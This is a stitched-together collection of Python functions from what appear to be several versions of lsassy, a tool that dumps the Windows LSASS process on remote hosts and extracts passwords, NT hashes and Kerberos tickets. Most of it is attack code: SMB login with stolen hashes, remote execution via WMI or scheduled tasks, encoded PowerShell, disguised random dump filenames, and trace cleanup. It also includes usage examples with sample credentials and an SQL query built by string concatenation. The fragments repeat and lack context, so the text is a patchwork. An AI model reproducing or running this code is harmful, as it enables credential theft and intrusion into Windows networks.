def run_lsassy(
self, context, connection
): # Couldn't figure out how to properly retrieve output from the module without editing. Blatantly ripped from lsassy_dump.py. Thanks pixis - @hackanddo!
logger.init(quiet=True)
host = connection.host
domain_name = connection.domain
username = connection.username
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
session = Session()
session.get_session(address=host,
target_ip=host,
port=445,
lmhash=lmhash,
nthash=nthash,
username=username,
password=password,
domain=domain_name)
if session.smb_session is None:
context.log.error(
"Couldn't connect to remote host. Password likely expired/changed. Removing from DB."
)
cursor.execute(
"UPDATE admin_users SET hash = NULL WHERE username LIKE '" +
username + "'")
return False
dumper = Dumper(session, timeout=10,
time_between_commands=7).load(self.method)
if dumper is None:
context.log.error("Unable to load dump method '{}'".format(
self.method))
return False
file = dumper.dump()
if file is None:
context.log.error("Unable to dump lsass")
return False
credentials, tickets, masterkeys = Parser(file).parse()
file.close()
ImpacketFile.delete(session, file.get_file_path())
if credentials is None:
credentials = []
credentials = [
cred.get_object() for cred in credentials
if not cred.get_username().endswith("$")
]
credentials_unique = []
credentials_output = []
for cred in credentials:
if [
cred["domain"], cred["username"], cred["password"],
cred["lmhash"], cred["nthash"]
] not in credentials_unique:
credentials_unique.append([
cred["domain"], cred["username"], cred["password"],
cred["lmhash"], cred["nthash"]
])
credentials_output.append(cred)
global credentials_data
credentials_data = credentials_output
def __init__(self, session, timeout, *args, **kwargs):
self._session = session
self._file = ImpacketFile(self._session)
self._file_handle = None
self._executor_name = ""
self._executor_path = ""
self._executor_copied = False
self._timeout = timeout
def on_admin_login(self, context, connection):
logger.init(quiet=True)
host = connection.host
domain_name = connection.domain
username = connection.username
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
session = Session()
session.get_session(address=host,
target_ip=host,
port=445,
lmhash=lmhash,
nthash=nthash,
username=username,
password=password,
domain=domain_name)
if session.smb_session is None:
context.log.error("Couldn't connect to remote host")
return False
dumper = Dumper(session, timeout=10).load(self.method)
if dumper is None:
context.log.error("Unable to load dump method '{}'".format(
self.method))
return False
file = dumper.dump()
if file is None:
context.log.error("Unable to dump lsass")
return False
credentials, tickets = Parser(file).parse()
file.close()
ImpacketFile.delete(session, file.get_file_path())
if credentials is None:
credentials = []
credentials = [
cred.get_object() for cred in credentials
if not cred.get_username().endswith("$")
]
credentials_unique = []
credentials_output = []
for cred in credentials:
if [
cred["domain"], cred["username"], cred["password"],
cred["lmhash"], cred["nthash"]
] not in credentials_unique:
credentials_unique.append([
cred["domain"], cred["username"], cred["password"],
cred["lmhash"], cred["nthash"]
])
credentials_output.append(cred)
self.process_credentials(context, connection, credentials_output)
def run():
import argparse
parser = argparse.ArgumentParser(
description='lsassy v{} - Remote lsass dump reader'.format(version))
group_auth = parser.add_argument_group('Authentication')
group_auth.add_argument('--hashes', action='store', help='[LM:]NT hash')
group_out = parser.add_argument_group('Output')
group_out.add_argument('-j',
'--json',
action='store_true',
help='Print credentials in JSON format')
group_out.add_argument('-k',
'--kerberos-dir',
help='Save kerberos tickets to a directory.')
group_out.add_argument('-g',
'--grep',
action='store_true',
help='Print credentials in greppable format')
group_out.add_argument('-o', '--outfile', help='Save results to file')
parser.add_argument('-r',
'--raw',
action='store_true',
help='Raw results without filtering')
parser.add_argument('-d',
'--debug',
action='store_true',
help='Debug output')
parser.add_argument('-V',
'--version',
action='version',
version='%(prog)s (version {})'.format(version))
parser.add_argument(
'target',
action='store',
help=
'[domain/]username[:password]@<host>:/share_name/path/to/lsass/dump')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
conn, share_name, file_path = ImpacketConnection.from_args(
args, args.debug)
ifile = ImpacketFile()
ifile.open(conn, share_name, file_path)
dumpfile = pypykatz.parse_minidump_external(ifile)
parser = Parser(dumpfile)
parser.output(args)
def run():
import argparse
parser = argparse.ArgumentParser(description='Pure Python implementation of Mimikatz --and more--')
parser.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
parser.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
parser.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
parser.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
parser.add_argument('-d', '--debug', action='store_true', help = 'Debug output')
parser.add_argument('target', action='store', help='[domain/]username[:password]@<host>:/shareName/path/to/lsass/dump')
parser.add_argument('-V', '--version', action='version', version='%(prog)s (version {})'.format(version))
args = parser.parse_args()
conn, share_name, file_path = ImpacketConnection.from_args(args, args.debug)
ifile = ImpacketFile()
ifile.open(conn, share_name, file_path)
dumpfile = pypykatz.parse_minidump_external(ifile)
LSACMDHelper().process_results({"dumfile": dumpfile}, [], args)
def upload(self, session):
# Upload dependency
if self.content is None:
logging.debug('Copy {} to {}'.format(self.path, self.remote_path))
with open(self.path, 'rb') as p:
try:
session.smb_session.putFile(self.remote_share, self.remote_path + self.file, p.read)
logging.success("{} uploaded".format(self.name))
self.uploaded = True
return True
except Exception as e:
logging.error("{} upload error".format(self.name), exc_info=True)
return None
else:
if not ImpacketFile.create_file(session, self.remote_share, self.remote_path, self.file, self.content):
logging.error("{} upload error".format(self.name), exc_info=True)
return None
logging.success("{} uploaded".format(self.name))
self.uploaded = True
return True
def run():
import argparse
examples = '''examples:
** RunDLL Dump Method **
lsassy adsec.local/pixis:[email protected]
** Procdump Dump Method **
lsassy -P /tmp/procdump.exe adsec.local/pixis:[email protected]
** Remote parsing only **
lsassy -p C$/Windows/Temp/lsass.dmp adsec.local/pixis:[email protected]
** Output functions **
lsassy -j -q -p C$/Windows/Temp/lsass.dmp [email protected]
lsassy --hashes 952c28bd2fd728898411b301475009b7 [email protected]
lsassy -d adsec.local/pixis:[email protected]'''
parser = argparse.ArgumentParser(
prog="lsassy",
description='lsassy v{} - Remote lsass dump reader'.format(version),
epilog=examples,
formatter_class=argparse.RawDescriptionHelpFormatter)
group_auth = parser.add_argument_group('procdump (default DLL)')
group_auth.add_argument('-p',
'--procdump',
action='store',
help='procdump path')
group_auth = parser.add_argument_group('authentication')
group_auth.add_argument('--hashes', action='store', help='[LM:]NT hash')
group_out = parser.add_argument_group('output')
group_out.add_argument('-j',
'--json',
action='store_true',
help='Print credentials in JSON format')
group_out.add_argument('-g',
'--grep',
action='store_true',
help='Print credentials in greppable format')
group_extract = parser.add_argument_group('remote parsing only')
group_extract.add_argument(
'--dumppath',
action='store',
help='lsass dump path (Format : c$/Temp/lsass.dmp)')
parser.add_argument('-r',
'--raw',
action='store_true',
help='Raw results without filtering')
parser.add_argument('-d',
'--debug',
action='store_true',
help='Debug output')
parser.add_argument('-q',
'--quiet',
action='store_true',
help='Quiet mode, only display credentials')
parser.add_argument('-V',
'--version',
action='version',
version='%(prog)s (version {})'.format(version))
parser.add_argument('target',
action='store',
help='[domain/]username[:password]@<host>')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
logger = Logger(args.debug, args.quiet)
conn = ImpacketConnection.from_args(args, logger)
file_path = args.dumppath
dumper = None
if not args.dumppath:
dumper = Dumper(conn, args, logger)
if args.procdump:
file_path = dumper.dump("procdump")
else:
file_path = dumper.dump("dll")
if not file_path:
exit()
ifile = ImpacketFile(logger)
ifile.open(conn, file_path)
dumpfile = pypykatz.parse_minidump_external(ifile)
ifile.close()
parser = Parser(dumpfile, logger)
parser.output(args)
if dumper is not None:
dumper.clean()
conn.close()
def clean(self):
if self.procdump_uploaded:
ImpacketFile.delete(self._session,
self.procdump_remote_path + self.procdump,
timeout=self._timeout)
def dump(self):
"""
Dump lsass on remote host. Different methods can be used.
If you chose to dump lsass using built-in comsvcs.dll method, you need SeDebugPrivilege. This privilege
is either in Powershell admin context, or cmd.exe SYSTEM context.
Two execution methods can be used.
1. WMIExec with cmd.exe (no SeDebugPrivilege) or powershell.exe (SeDebugPrivilege)
2. ScheduledTask which is SYSTEM context (SeDebugPrivilege).
These constraints lead to different possibilities. By default, comsvcs.dll method will be used and will try
Powershell with WMI, Powershell with scheduled task, and cmd.exe with scheduled task
"""
"""
A "methodology can be described in an array of 3 elements:
1. 1st element : Dump method to use (dll, procdump)
2. Shell context to use (powershell, cmd)
3. List of remote execution methods (wmi, task)
"""
if self._method == "0":
dump_methodologies = [["dll", "powershell", ("wmi", "task")],
["dll", "cmd", ("task", )],
["procdump", "cmd", ("wmi", "task")]]
elif self._method == "1":
dump_methodologies = [["dll", "powershell", ("wmi", "task")],
["dll", "cmd", ("task", )]]
elif self._method == "2":
dump_methodologies = [["procdump", "cmd", ("wmi", "task")]]
elif self._method == "3":
dump_methodologies = [["dll", "powershell", ("wmi", "task")]]
elif self._method == "4":
dump_methodologies = [["dll", "cmd", ("task", )]]
else:
self._log.error(
"Method \"{}\" is not supported (0-4). See -h for help".format(
self._method))
return False
ifile = ImpacketFile(self._conn, self._log)
for dump_methodology in dump_methodologies:
dump_method, exec_shell, exec_methods = dump_methodology
self._log.debug("Trying \"{}\" method".format(dump_method))
if dump_method == "dll":
dumped = self.dll_dump(exec_methods, exec_shell)
elif dump_method == "procdump":
dumped = self.procdump_dump(exec_methods)
else:
self._log.error(
"Incorrect dump method \"{}\". Currently supported : procdump, dll"
.format(dump_method))
continue
if dumped:
"""
If procdump failed, a dumpfile was created, and its content is "FAILED"
Best guess is that lsass is protected in some way (PPL, AV, ...)
"""
try:
ifile.open((self._share + self._tmp_dir +
self._remote_lsass_dump).replace("\\", "/"),
timeout=self._timeout)
if ifile.size() < 100 and ifile.read(6).decode(
'utf-8') == "FAILED":
self._log.error("lsass is protected")
ifile.close()
return False
ifile.seek(0)
return ifile
except Exception as e:
self._log.warn(
"No dump file found with \"{}\" using \"{}\" exec method."
.format(dump_method, exec_shell))
self._log.debug("Error : {}".format(str(e)))
"""
If no dump file was found, it means that procdump didn't crash, so it may take more time than expected.
"""
self._log.warn("Target could be slow. Try to increase --timeout value")
return False
def __init__(self, session, timeout, *args, **kwargs):
self._session = session
self._file = ImpacketFile(self._session)
self._file_handle = None
self._timeout = timeout
class IDumpMethod:
need_debug_privilege = False
custom_dump_path_support = True
custom_dump_name_support = True
dump_name = ""
dump_share = "C$"
dump_path = "\\Windows\\Temp\\"
exec_methods = ("smb", "wmi", "task", "mmc")
def __init__(self, session, timeout, *args, **kwargs):
self._session = session
self._file = ImpacketFile(self._session)
self._file_handle = None
self._timeout = timeout
def get_exec_method(self, exec_method, no_powershell=False):
try:
exec_method = importlib.import_module(
"lsassy.exec.{}".format(exec_method.lower()),
"Exec").Exec(self._session)
except ModuleNotFoundError:
logging.error("Exec module '{}' doesn't exist".format(
exec_method.lower()),
exc_info=True)
return None
if not self.need_debug_privilege or exec_method.debug_privilege:
return exec_method
if no_powershell:
return None
return exec_method
def get_commands(self):
raise NotImplementedError
def prepare(self, options):
return True
def clean(self):
return True
def exec_method(self):
return self.need_debug_privilege
def build_exec_command(self, commands, exec_method, no_powershell=False):
logging.debug(
"Building command - Exec Method has seDebugPrivilege: {} | seDebugPrivilege needed: {} | Powershell allowed: {}"
.format(exec_method.debug_privilege, self.need_debug_privilege,
not no_powershell))
if commands["cmd"] is not None and (not self.need_debug_privilege
or exec_method.debug_privilege):
logging.debug(commands["cmd"])
built_command = """cmd.exe /Q /c {}""".format(commands["cmd"])
elif commands["pwsh"] is not None and not no_powershell:
logging.debug(commands["pwsh"])
command = base64.b64encode(
commands["pwsh"].encode('UTF-16LE')).decode("utf-8")
built_command = "powershell.exe -NoP -Enc {}".format(command)
else:
logging.error("Shouldn't fall here. Incompatible constraints")
return None
return built_command
def dump(self,
dump_path=None,
dump_name=None,
no_powershell=False,
exec_methods=None,
timeout=5,
**kwargs):
logging.info("Dumping via {}".format(self.__module__))
if exec_methods is not None:
self.exec_methods = exec_methods
if dump_name is not None:
if not self.custom_dump_name_support:
logging.warning(
"A custom dump name was provided, but dump method {} doesn't support custom dump name"
.format(self.__module__))
logging.warning("Dump file will be {}".format(self.dump_name))
else:
self.dump_name = dump_name
elif self.dump_name == "":
ext = [
"csv", "db", "dbf", "log", "sav", "sql", "tar", "xml", "fnt",
"fon", "otf", "ttf", "bak", "cfg", "cpl", "cur", "dll", "drv",
"icns", "ico", "ini", "lnk", "msi", "sys", "tmp", "doc",
"docx", "odt", "pdf", "rtf", "tex", "txt", "wpd", "png", "jpg"
]
self.dump_name = "{}.{}".format(
''.join(
random.choice(string.ascii_letters + string.digits)
for _ in range(random.randint(3, 9))), random.choice(ext))
if dump_path is not None:
if not self.custom_dump_path_support:
logging.warning(
"A custom dump path was provided, but dump method {} doesn't support custom dump path"
.format(self.__module__))
logging.warning("Dump path will be {}{}".format(
self.dump_share, self.dump_path))
else:
self.dump_path = dump_path
valid_exec_methods = {}
for e in self.exec_methods:
exec_method = self.get_exec_method(e, no_powershell)
if exec_method is not None:
valid_exec_methods[e] = exec_method
else:
logging.debug("Exec method '{}' is not compatible".format(e))
if len(valid_exec_methods) == 0:
logging.error("Current dump constrains cannot be fulfilled")
logging.debug("Dump class: {} (Need SeDebugPrivilege: {})".format(
self.__module__, self.need_debug_privilege))
logging.debug("Exec methods: {}".format(self.exec_methods))
logging.debug("Powershell allowed: {}".format(
"No" if no_powershell else "Yes"))
return None
if self.prepare(kwargs) is None:
logging.error("Module prerequisites could not be processed")
self.clean()
return None
try:
commands = self.get_commands()
except NotImplementedError:
logging.warning(
"Module '{}' hasn't implemented all required methods".format(
self.__module__))
return None
if not isinstance(
commands,
dict) or "cmd" not in commands or "pwsh" not in commands:
logging.warning(
"Return value of {} was not expected. Expecting {'cmd':'...', 'pwsh':'...'}"
)
return None
for e, exec_method in valid_exec_methods.items():
logging.info("Trying {} method".format(e))
exec_command = self.build_exec_command(commands, exec_method,
no_powershell)
if exec_command is None:
# Shouldn't fall there, but if we do, just skip to next execution method
continue
logging.debug("Transformed command: {}".format(exec_command))
try:
if not exec_method.exec(exec_command):
logging.error("Failed to dump lsass using {}".format(e))
self.clean()
continue
self._file_handle = self._file.open(self.dump_share,
self.dump_path,
self.dump_name,
timeout=timeout)
if self._file_handle is None:
logging.error("Failed to dump lsass using {}".format(e))
self.clean()
continue
logging.success(
"Lsass dumped successfully in C:{}{} ({} Bytes)".format(
self.dump_path, self.dump_name,
self._file_handle.size()))
self.clean()
return self._file_handle
except Exception:
logging.error("Execution method {} has failed".format(
exec_method.__module__),
exc_info=True)
continue
logging.error("All execution methods have failed")
self.clean()
return None
def failsafe(self, timeout=3):
t = time.time()
while True:
if self._file_handle is not None:
self._file_handle.delete(timeout=timeout)
else:
try:
self._session.smb_session.deleteFile(
self.dump_share, self.dump_path + "/" + self.dump_name)
logging.debug("Lsass dump successfully deleted")
except Exception as e:
if "STATUS_OBJECT_NAME_NOT_FOUND" in str(
e) or "STATUS_NO_SUCH_FILE" in str(e):
return True
if time.time() - t > timeout:
logging.warning(
"Lsass dump wasn't removed in {}{}".format(
self.dump_share,
self.dump_path + "/" + self.dump_name),
exc_info=True)
return None
logging.debug(
"Unable to delete lsass dump file {}{}. Retrying...".
format(self.dump_share,
self.dump_path + "/" + self.dump_name))
time.sleep(0.5)
def clean(self):
if self.comsvcs_copied:
ImpacketFile.delete(self._session,
self.comsvcs_copy_path +
self.comsvcs_copy_name,
timeout=self._timeout)
def run(self):
"""
Main method to dump credentials on a remote host
"""
session, file, dumper, method = None, None, None, None
# Credential parsing
username = self.args.username if self.args.username else ""
password = self.args.password if self.args.password else ""
lmhash, nthash = "", ""
if not password and self.args.hashes:
if ":" in self.args.hashes:
lmhash, nthash = self.args.hashes.split(":")
else:
lmhash, nthash = 'aad3b435b51404eeaad3b435b51404ee', self.args.hashes
# Exec methods parsing
exec_methods = self.args.exec.split(",") if self.args.exec else None
# Dump modules options parsing
options = {
v.split("=")[0]: v.split("=")[1]
for v in self.args.options.split(",")
} if self.args.options else {}
# Dump path checks
dump_path = self.args.dump_path
if dump_path:
dump_path = dump_path.replace('/', '\\')
if len(dump_path) > 1 and dump_path[1] == ":":
if dump_path[0] != "C":
logging.error(
"Drive '{}' is not supported. 'C' drive only.".format(
dump_path[0]))
return False
dump_path = dump_path[2:]
if dump_path[-1] != "\\":
dump_path += "\\"
parse_only = self.args.parse_only
kerberos_dir = self.args.kerberos_dir
if parse_only and (dump_path is None or self.args.dump_name is None):
logging.error(
"--dump-path and --dump-name required for --parse-only option")
return False
try:
session = Session()
session.get_session(address=self.target,
target_ip=self.target,
port=self.args.port,
lmhash=lmhash,
nthash=nthash,
username=username,
password=password,
domain=self.args.domain,
aesKey=self.args.aesKey,
dc_ip=self.args.dc_ip,
kerberos=self.args.kerberos,
timeout=self.args.timeout)
if session.smb_session is None:
logging.error("Couldn't connect to remote host")
return False
if not parse_only:
dumper = Dumper(session,
self.args.timeout).load(self.args.dump_method)
if dumper is None:
logging.error("Unable to load dump module")
return False
file = dumper.dump(no_powershell=self.args.no_powershell,
exec_methods=exec_methods,
dump_path=dump_path,
dump_name=self.args.dump_name,
timeout=self.args.timeout,
**options)
if file is None:
logging.error("Unable to dump lsass.")
return False
else:
file = ImpacketFile(session).open(share="C$",
path=dump_path,
file=self.args.dump_name,
timeout=self.args.timeout)
if file is None:
logging.error("Unable to open lsass dump.")
return False
credentials, tickets = Parser(file).parse()
file.close()
if not parse_only:
ImpacketFile.delete(session,
file.get_file_path(),
timeout=self.args.timeout)
logging.success("Lsass dump successfully deleted")
else:
logging.debug(
"Not deleting lsass dump as --parse-only was provided")
if credentials is None:
logging.error(
"Unable to extract credentials from lsass. Cleaning.")
return False
with lock:
Writer(credentials,
tickets).write(self.args.format,
output_file=self.args.outfile,
quiet=self.args.quiet,
users_only=self.args.users,
kerberos_dir=kerberos_dir)
except KeyboardInterrupt:
pass
except Exception as e:
logging.error("An unknown error has occurred.", exc_info=True)
finally:
logging.debug("Cleaning...")
logging.debug("dumper: {}".format(dumper))
logging.debug("file: {}".format(file))
logging.debug("session: {}".format(session))
try:
dumper.clean()
logging.debug("Dumper cleaned")
except Exception as e:
logging.debug(
"Potential issue while cleaning dumper: {}".format(str(e)))
try:
file.close()
logging.debug("File closed")
except Exception as e:
logging.debug("Potential issue while closing file: {}".format(
str(e)))
if not parse_only:
try:
if ImpacketFile.delete(session,
file_path=file.get_file_path(),
timeout=self.args.timeout):
logging.debug("Lsass dump successfully deleted")
except Exception as e:
try:
logging.debug(
"Couldn't delete lsass dump using file. Trying dump object..."
)
if ImpacketFile.delete(session,
file_path=dumper.dump_path +
dumper.dump_name,
timeout=self.args.timeout):
logging.debug("Lsass dump successfully deleted")
except Exception as e:
logging.debug(
"Potential issue while deleting lsass dump: {}".
format(str(e)))
try:
session.smb_session.close()
logging.debug("SMB session closed")
except Exception as e:
logging.debug(
"Potential issue while closing SMB session: {}".format(
str(e)))
def run():
import argparse
examples = '''examples:
** RunDLL Dump Method **
lsassy adsec.local/pixis:[email protected]
** Try all methods **
lsassy -m 0 adsec.local/pixis:[email protected]
** Procdump Dump Method **
lsassy -m 2 -p /tmp/procdump.exe adsec.local/pixis:[email protected]
** Remote parsing only **
lsassy --dumppath C$/Windows/Temp/lsass.dmp adsec.local/pixis:[email protected]
** Output functions **
lsassy -j -q [email protected]
lsassy -g --hashes 952c28bd2fd728898411b301475009b7 [email protected]'''
parser = argparse.ArgumentParser(
prog="lsassy",
description='lsassy v{} - Remote lsass dump reader'.format(version),
epilog=examples,
formatter_class=argparse.RawTextHelpFormatter
)
group_auth = parser.add_argument_group('authentication')
group_auth.add_argument('--hashes', action='store', help='[LM:]NT hash')
group_out = parser.add_argument_group('output')
group_out.add_argument('-j', '--json', action='store_true',help='Print credentials in JSON format')
group_out.add_argument('-g', '--grep', action='store_true', help='Print credentials in greppable format')
group_extract = parser.add_argument_group('remote parsing only')
group_extract.add_argument('--dumppath', action='store', help='lsass dump path (Format : c$/Temp/lsass.dmp)')
parser.add_argument('-m', '--method', action='store', default="1", help='''Dumping method
0: Try all methods to dump procdump, stop on success (Requires -p if dll method fails)
1: comsvcs.dll method, stop on success (default)
2: Procdump method, stop on success (Requires -p)
3: comsvcs.dll + Powershell method, stop on success
4: comsvcs.dll + cmd.exe method''')
parser.add_argument('--dumpname', action='store', help='Name given to lsass dump (Default: Random)')
parser.add_argument('-p', '--procdump', action='store', help='Procdump path')
parser.add_argument('-r', '--raw', action='store_true', help='No basic result filtering')
parser.add_argument('-d', '--debug', action='store_true', help='Debug output')
parser.add_argument('-q', '--quiet', action='store_true', help='Quiet mode, only display credentials')
parser.add_argument('-V', '--version', action='version', version='%(prog)s (version {})'.format(version))
parser.add_argument('target', action='store', help='[domain/]username[:password]@<host>')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
logger = Logger(args.debug, args.quiet)
conn = ImpacketConnection.from_args(args, logger)
file_path = args.dumppath
dumper = None
if not args.dumppath:
dumper = Dumper(conn, args, logger)
file_path = dumper.dump()
if not file_path:
logger.error("lsass could not be dumped")
exit()
logger.success("Process lsass.exe is being dumped")
ifile = ImpacketFile(logger)
ifile.open(conn, file_path)
dumpfile = pypykatz.parse_minidump_external(ifile)
ifile.close()
parser = Parser(dumpfile, logger)
parser.output(args)
if dumper is not None:
dumper.clean()
conn.close()
def clean_loader(self):
if self.loader_uploaded:
ImpacketFile.delete(self._session,
self.loader_remote_path + self.loader,
timeout=self._timeout)
def clean(self, session, timeout):
if self.uploaded:
ImpacketFile.delete(session, self.remote_path + self.file, timeout=timeout)
def executor_clean(self):
if self._executor_copied:
ImpacketFile.delete(self._session, self._executor_path + self._executor_name, timeout=self._timeout)
logging.debug("Executor copy deleted")
def clean(self):
if self.dumpertdll_uploaded:
ImpacketFile.delete(self._session,
self.dumpertdll_remote_path + self.dumpertdll,
timeout=self._timeout)
def run():
import argparse
examples = '''examples:
** RunDLL Dump Method **
lsassy adsec.local/pixis:[email protected]
** Try all methods **
lsassy -m 0 adsec.local/pixis:[email protected]
** Procdump Dump Method **
lsassy -m 2 -p /tmp/procdump.exe adsec.local/pixis:[email protected]
** Remote parsing only **
lsassy --dumppath C$/Windows/Temp/lsass.dmp adsec.local/pixis:[email protected]
** Output functions **
lsassy -j -q [email protected]
lsassy -g --hashes 952c28bd2fd728898411b301475009b7 [email protected]'''
parser = argparse.ArgumentParser(
prog="lsassy",
description='lsassy v{} - Remote lsass dump reader'.format(version),
epilog=examples,
formatter_class=argparse.RawTextHelpFormatter)
group_dump = parser.add_argument_group('dump')
group_dump.add_argument('-m',
'--method',
action='store',
default="1",
help='''Dumping method
0: Try all methods (dll then procdump) to dump lsass, stop on success (Requires -p if dll method fails)
1: comsvcs.dll method, stop on success (default)
2: Procdump method, stop on success (Requires -p)
3: comsvcs.dll + Powershell method, stop on success
4: comsvcs.dll + cmd.exe method''')
group_dump.add_argument('--dumpname',
action='store',
help='Name given to lsass dump (Default: Random)')
group_dump.add_argument('-p',
'--procdump',
action='store',
help='Procdump path')
group_dump.add_argument(
'--timeout',
default="10",
action='store',
help='Timeout before considering lsass was not dumped successfully')
group_auth = parser.add_argument_group('authentication')
group_auth.add_argument('--hashes', action='store', help='[LM:]NT hash')
group_out = parser.add_argument_group('output')
group_out.add_argument('-j',
'--json',
action='store_true',
help='Print credentials in JSON format')
group_out.add_argument('-g',
'--grep',
action='store_true',
help='Print credentials in greppable format')
group_extract = parser.add_argument_group('remote parsing only')
group_extract.add_argument(
'--dumppath',
action='store',
help='lsass dump path (Format : c$/Temp/lsass.dmp)')
parser.add_argument(
'-r',
'--raw',
action='store_true',
help=
'No basic result filtering (Display host credentials and duplicates)')
parser.add_argument('-d',
'--debug',
action='store_true',
help='Debug output')
parser.add_argument('-q',
'--quiet',
action='store_true',
help='Quiet mode, only display credentials')
parser.add_argument('-V',
'--version',
action='version',
version='%(prog)s (version {})'.format(version))
parser.add_argument('target',
action='store',
help='[domain/]username[:password]@<host>')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(RetCode(ERROR_MISSING_ARGUMENTS).error_code)
args = parser.parse_args()
logger = Logger(args.debug, args.quiet)
conn = ImpacketConnection.from_args(args, logger)
if isinstance(conn, RetCode):
return_code = conn
lsassy_exit(logger, return_code)
return_code = conn.isadmin()
if not return_code.success():
conn.close()
lsassy_exit(logger, return_code)
dumper = None
ifile = None
try:
if not args.dumppath:
dumper = Dumper(conn, args, logger)
ifile = dumper.dump()
if isinstance(ifile, RetCode):
return_code = ifile
else:
logger.success("Process lsass.exe has been dumped")
else:
ifile = ImpacketFile(conn, logger).open(args.dumppath)
if not isinstance(ifile, ImpacketFile):
return_code = ifile
if return_code.success():
dumpfile = pypykatz.parse_minidump_external(ifile)
ifile.close()
parser = Parser(dumpfile, logger)
parser.output(args)
except KeyboardInterrupt as e:
print("\nQuitting gracefully...")
return_code = RetCode(ERROR_USER_INTERRUPTION)
except Exception as e:
return_code = RetCode(ERROR_UNDEFINED, e)
pass
finally:
try:
ifile.close()
except Exception as e:
pass
if dumper is not None:
dumper.clean()
conn.close()
lsassy_exit(logger, return_code)